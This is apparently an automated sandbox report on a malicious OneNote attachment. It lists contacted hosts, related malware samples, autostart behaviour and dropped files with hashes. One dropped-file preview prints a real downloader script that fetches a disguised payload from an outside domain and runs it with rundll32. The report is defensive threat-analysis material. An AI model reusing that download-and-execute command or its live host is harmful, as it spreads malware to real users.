                                                                                                                                                https://api.powerbi.com/beta/myorg/importsD95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drfalse
                                                                                                                                                  		high

                                                                                                                                                  World Map of Contacted IPs

                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                  • 75% < No. of IPs

                                                                                                                                                  Public IPs

                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                  109.203.123.62
                                                                                                                                                  		nerulgymkhana.comUnited Kingdom
                                                                                                                                                  		31727NODE4-ASGBfalse

                                                                                                                                                  General Information

                                                                                                                                                  Joe Sandbox Version:36.0.0 Rainbow Opal
                                                                                                                                                  Analysis ID:800789
                                                                                                                                                  Start date and time:2023-02-07 19:52:22 +01:00
                                                                                                                                                  Joe Sandbox Product:CloudBasic
                                                                                                                                                  Overall analysis duration:0h 9m 25s
                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                  Report type:full
                                                                                                                                                  Cookbook file name:default.jbs
                                                                                                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                  Number of analysed new started processes analysed:24
                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                  Technologies:
                                                                                                                                                  • HCA enabled
                                                                                                                                                  • EGA enabled
                                                                                                                                                  • HDC enabled
                                                                                                                                                  • AMSI enabled
                                                                                                                                                  Analysis Mode:default
                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                  Sample file name:Original.one
                                                                                                                                                  Detection:MAL
                                                                                                                                                  Classification:mal64.expl.evad.winONE@14/326@1/1
                                                                                                                                                  EGA Information:Failed
                                                                                                                                                  HDC Information:Failed
                                                                                                                                                  HCA Information:
                                                                                                                                                  • Successful, ratio: 100%
                                                                                                                                                  • Number of executed functions: 0
                                                                                                                                                  • Number of non-executed functions: 0
                                                                                                                                                  Cookbook Comments:
                                                                                                                                                  • Found application associated with file extension: .one
                                                                                                                                                  • Override analysis time to 240s for rundll32

                                                                                                                                                  Warnings

                                                                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, rundll32.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                                                                                                                                  • Excluded IPs from analysis (whitelisted): 52.109.88.191, 20.234.90.154, 20.224.201.79
                                                                                                                                                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, prod-w.nexus.live.com.akadns.net, config.officeapps.live.com, prod.configsvc1.live.com.akadns.net, ctldl.windowsupdate.com, nexus.officeapps.live.com, officeclient.microsoft.com, europe.configsvc1.live.com.akadns.net
                                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                  • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                  • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                  • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                                                                                  • Report size getting too big, too many NtReadFile calls found.
                                                                                                                                                  • Report size getting too big, too many NtSetInformationFile calls found.

                                                                                                                                                  Simulations

                                                                                                                                                  Behavior and APIs

                                                                                                                                                  TimeTypeDescription
                                                                                                                                                  19:53:32API Interceptor12x Sleep call for process: powershell.exe modified
                                                                                                                                                  19:53:45AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Send to OneNote.lnk

                                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                                  IPs

                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                  109.203.123.62note.oneGet hashmaliciousBrowse

                                                                                                                                                    Domains

                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                    nerulgymkhana.comnote.oneGet hashmaliciousBrowse
                                                                                                                                                    • 109.203.123.62

                                                                                                                                                    ASNs

                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                    NODE4-ASGBnote.oneGet hashmaliciousBrowse
                                                                                                                                                    • 109.203.123.62
                                                                                                                                                    https://lnkd.in/gJHSZYMD#b2tlZG1sX2NvdXJ0X2RvY2tldHNAb2tlZC51c2NvdXJ0cy5nb3Y=Get hashmaliciousBrowse
                                                                                                                                                    • 109.203.123.194
                                                                                                                                                    http://dhl-mybill.accountis.netGet hashmaliciousBrowse
                                                                                                                                                    • 109.234.201.207
                                                                                                                                                    U_0211.zipGet hashmaliciousBrowse
                                                                                                                                                    • 109.203.109.96
                                                                                                                                                    Linux_amd64Get hashmaliciousBrowse
                                                                                                                                                    • 158.255.226.106
                                                                                                                                                    a5hB51euRT.exeGet hashmaliciousBrowse
                                                                                                                                                    • 185.144.110.99
                                                                                                                                                    aD7q0VGVnM.elfGet hashmaliciousBrowse
                                                                                                                                                    • 93.174.140.186
                                                                                                                                                    Payment Remittance Advice 09022022.exeGet hashmaliciousBrowse
                                                                                                                                                    • 185.151.28.67
                                                                                                                                                    http://trk.emailforyou.co.uk/f/a/PRsUsy_EnsYXd-ZlKecX3Q~~/AAAq-gA~/RgRk8FfIP0RYaHR0cHM6Ly9jbGljay5lbWFpbGZvcnlvdS5jby51ay9nYS93ZWJ2aWV3cy80LTIwNDgwMjA5My01Ny05MzYyNC05MzMyMS0xODMwNDEtdTM2ZDU2NDNhZFcFc3BjZXVCCmMDSCQPY8RnWCVSEnNiYWxtZUB2aWN0cmV4LmNvbVgEAAAACA~~Get hashmaliciousBrowse
                                                                                                                                                    • 158.255.46.189
                                                                                                                                                    SecuriteInfo.com.Trojan.GenericKD.61507220.29657.4898.xlsxGet hashmaliciousBrowse
                                                                                                                                                    • 5.77.39.90
                                                                                                                                                    SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.10071.exeGet hashmaliciousBrowse
                                                                                                                                                    • 109.203.124.234
                                                                                                                                                    qxRO14VSTD.dllGet hashmaliciousBrowse
                                                                                                                                                    • 185.199.22.2
                                                                                                                                                    lMvwq53N1x.dllGet hashmaliciousBrowse
                                                                                                                                                    • 148.253.152.20
                                                                                                                                                    KzNCczOeyE.dllGet hashmaliciousBrowse
                                                                                                                                                    • 109.75.172.209
                                                                                                                                                    UjhHNEfOFP.dllGet hashmaliciousBrowse
                                                                                                                                                    • 77.111.227.188
                                                                                                                                                    XzPa4QOz1iGet hashmaliciousBrowse
                                                                                                                                                    • 185.225.252.125
                                                                                                                                                    SecuriteInfo.com.Variant.Tedy.164775.28245.exeGet hashmaliciousBrowse
                                                                                                                                                    • 109.203.124.234
                                                                                                                                                    SecuriteInfo.com.Trojan.MSIL.Inject.10631.exeGet hashmaliciousBrowse
                                                                                                                                                    • 109.203.124.234
                                                                                                                                                    miori.arm7-20220625-0900Get hashmaliciousBrowse
                                                                                                                                                    • 185.225.252.141
                                                                                                                                                    Rxpb2zKOR3.exeGet hashmaliciousBrowse
                                                                                                                                                    • 213.175.217.57

                                                                                                                                                    JA3 Fingerprints

                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                    54328bd36c14bd82ddaa0c04b25ed9adCancellation.oneGet hashmaliciousBrowse
                                                                                                                                                    • 109.203.123.62
                                                                                                                                                    DHL Original Document.exeGet hashmaliciousBrowse
                                                                                                                                                    • 109.203.123.62
                                                                                                                                                    DHL ORIGINAL DOCUMENTS.exeGet hashmaliciousBrowse
                                                                                                                                                    • 109.203.123.62
                                                                                                                                                    DHL ORIGINAL DOCUMENTS.exeGet hashmaliciousBrowse
                                                                                                                                                    • 109.203.123.62
                                                                                                                                                    EMIR....vbsGet hashmaliciousBrowse
                                                                                                                                                    • 109.203.123.62
                                                                                                                                                    transferencia........vbeGet hashmaliciousBrowse
                                                                                                                                                    • 109.203.123.62
                                                                                                                                                    Legal Notice.oneGet hashmaliciousBrowse
                                                                                                                                                    • 109.203.123.62
                                                                                                                                                    note.oneGet hashmaliciousBrowse
                                                                                                                                                    • 109.203.123.62
                                                                                                                                                    Review.htaGet hashmaliciousBrowse
                                                                                                                                                    • 109.203.123.62
                                                                                                                                                    Item.oneGet hashmaliciousBrowse
                                                                                                                                                    • 109.203.123.62
                                                                                                                                                    QmWGYm2HqaT7gVV3khAweBFc4LcX7ozKSJmvd5kyf35fub.exeGet hashmaliciousBrowse
                                                                                                                                                    • 109.203.123.62
                                                                                                                                                    Cancellation.oneGet hashmaliciousBrowse
                                                                                                                                                    • 109.203.123.62
                                                                                                                                                    QmWGYm2HqaT7gVV3khAweBFc4LcX7ozKSJmvd5kyf35fub.exeGet hashmaliciousBrowse
                                                                                                                                                    • 109.203.123.62
                                                                                                                                                    QmYAd15qhMNeFaDy9nmbTd9GMoJThq1mKKKJ4cyiv1uFyr.exeGet hashmaliciousBrowse
                                                                                                                                                    • 109.203.123.62
                                                                                                                                                    QmYAd15qhMNeFaDy9nmbTd9GMoJThq1mKKKJ4cyiv1uFyr.exeGet hashmaliciousBrowse
                                                                                                                                                    • 109.203.123.62
                                                                                                                                                    Revised_Order_Document.pdf.lnkGet hashmaliciousBrowse
                                                                                                                                                    • 109.203.123.62
                                                                                                                                                    prodotto elencato.vbeGet hashmaliciousBrowse
                                                                                                                                                    • 109.203.123.62
                                                                                                                                                    T0mfmDdkwX.exeGet hashmaliciousBrowse
                                                                                                                                                    • 109.203.123.62
                                                                                                                                                    SgcmXDoQO8.exeGet hashmaliciousBrowse
                                                                                                                                                    • 109.203.123.62
                                                                                                                                                    unpaid_1376-February-03.oneGet hashmaliciousBrowse
                                                                                                                                                    • 109.203.123.62

                                                                                                                                                    Dropped Files

                                                                                                                                                    No context

                                                                                                                                                    Created / dropped Files

                                                                                                                                                    C:\ProgramData\in.cmd

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Windows\System32\cmd.exe
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):168
                                                                                                                                                    Entropy (8bit):5.1809546211741235
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:2EKDDGKSSJJFsLTzTH3x8J3k4XgOFyKIEwOUr2qKMJAFm7zBJTTeJ6Fk9zBJTKyn:0SGYzLh8JnXETOAKMdXzTeJ62Jzp9Rrn
                                                                                                                                                    MD5:01334CD9D21D65FBA8AD4ECABD9A3CB1
                                                                                                                                                    SHA1:09372B85212386FE46AE5C72DDFDF94A16CBEBCD
                                                                                                                                                    SHA-256:CCDE06F3D61E0D17B1FB72CD6882A3E592BF88992287B9227EF50AF7F570B09C
                                                                                                                                                    SHA-512:34BDF192D4327CB92432871EF2544FCE92F3BFBEA93874E3576A58BD687174DB754F75A509264CADAF4E33E6D502A0B3A28ED5BE8B5C3CCF2EB3389F2683540B
                                                                                                                                                    Malicious:true
                                                                                                                                                    Preview:..@echo off..powershell Invoke-WebRequest -URI https://nerulgymkhana.com/CCoN/01.gif -OutFile C:\programdata\putty.jpg..rundll32 C:\programdata\putty.jpg,Wind..exit....

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\D95B36A3-A6E1-458A-A353-27D51DD43A0C

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):152234
                                                                                                                                                    Entropy (8bit):5.35599806489183
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:/+C7/gfYBIB9guwULQ9DQN+zQKk4F77nXmvidlXRcE6Lcz6I:NmQ9DQN+zpX/l
                                                                                                                                                    MD5:476810F58834EEAB66B3DCD3C374A4DF
                                                                                                                                                    SHA1:818A97076DAA80882E81C4F79F6F37AA5BE5A4BA
                                                                                                                                                    SHA-256:F520A9AA617486C6C38D1251B98509172B1851C9EB959DFBB3AC01B6825CFEF9
                                                                                                                                                    SHA-512:9FF652827817D33BD0AB7F7D966D146CDA5C3EC412A38542833F0662876F11EA6FBCEAB04894EECBD19B3B4B69F1F9DE7E52AFA48DAA34126B82B898E3F74858
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2023-02-07T18:53:23">.. Build: 16.0.16130.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId" o:authentication="1">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. <o:ticket o:policy="MBI_SSL_SHORT" o:idprovider="1" o:target="[MAX.AuthHost]" o:headerValue="Passport1.4 from-PP='{}&amp;p='" />.. <o:ticket o:idprovider="3" o:headerValue="Bearer {}" o:resourceId="[MAX.ResourceId]" o:authorityUrl="[ADALAuthorityU

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\header

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:Matlab v4 mat-file (little endian) , numeric, rows 262223750, columns 0
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):72
                                                                                                                                                    Entropy (8bit):1.362740278498934
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:ulXXRtAaRR//HRB/l:KB7RXxBt
                                                                                                                                                    MD5:607BCCCF2EC708053F9E047D8B0669CA
                                                                                                                                                    SHA1:06F44AA90BD3397E477B88DCC57FBD93FB87A47E
                                                                                                                                                    SHA-256:5F6D715BE15A4B7D1A5273E545C1C1BCCF865BE2E581661331DE2E312A5680B0
                                                                                                                                                    SHA-512:1C060EF18BEEC10FAA29DCA19375E843EE92ADED9E4FD57A7F8A579A463DC48B292FB57FC2CEFEC2E9707AB46E04BBF708AC633B99ABE5348BDF9CD1346EB2CF
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.....7..................................................................

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000005.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):3679
                                                                                                                                                    Entropy (8bit):7.931319059366604
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
                                                                                                                                                    MD5:995CEACAD563F849C4142B6A6F29F081
                                                                                                                                                    SHA1:44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
                                                                                                                                                    SHA-256:3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
                                                                                                                                                    SHA-512:3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.|.y|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<.*.....{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy*..ET.PM...c....~(.g..**...ol.K......Sc8..q.F.KM"<...:t.O.>b..$*t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@*D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`....*........M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000006.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):2232
                                                                                                                                                    Entropy (8bit):7.837610270261933
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
                                                                                                                                                    MD5:EDB5ED43CC6038500A54B90BEC493628
                                                                                                                                                    SHA1:A8CD63F3914E4347F4C5552FB922C6C03917F45F
                                                                                                                                                    SHA-256:9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
                                                                                                                                                    SHA-512:4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...*........A..!.A.....R.Ai%YH..(M.".h.cf*.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V*...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8..*.X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o|%..7..'.....N.|..Vi...q..uO,`/....\W{..y...&iI..|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.|....8..H......_...G...|......;6YQ|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000007.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1604
                                                                                                                                                    Entropy (8bit):7.814570704154439
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                    MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                    SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                    SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                    SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000008.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):13084
                                                                                                                                                    Entropy (8bit):7.940058639272698
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
                                                                                                                                                    MD5:0693DABBBC411538D209F32E22F622F6
                                                                                                                                                    SHA1:FB7E675406FA123CDB7E058D336742D6A2E8DC8E
                                                                                                                                                    SHA-256:2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
                                                                                                                                                    SHA-512:F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.*[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj*....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u........*..OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..*//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................)**,**...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....|r1

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000009.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1604
                                                                                                                                                    Entropy (8bit):7.814570704154439
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                    MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                    SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                    SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                    SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000A.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):4847
                                                                                                                                                    Entropy (8bit):7.950192613458318
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
                                                                                                                                                    MD5:A1A1017A6A7928761CEB56D1D950E123
                                                                                                                                                    SHA1:28272E9C7F816A1CE8F2033FC00F489005332365
                                                                                                                                                    SHA-256:72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
                                                                                                                                                    SHA-512:10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000B.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1604
                                                                                                                                                    Entropy (8bit):7.814570704154439
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                    MD5:3F1535054D4F9626F0EB10CEE47F076E
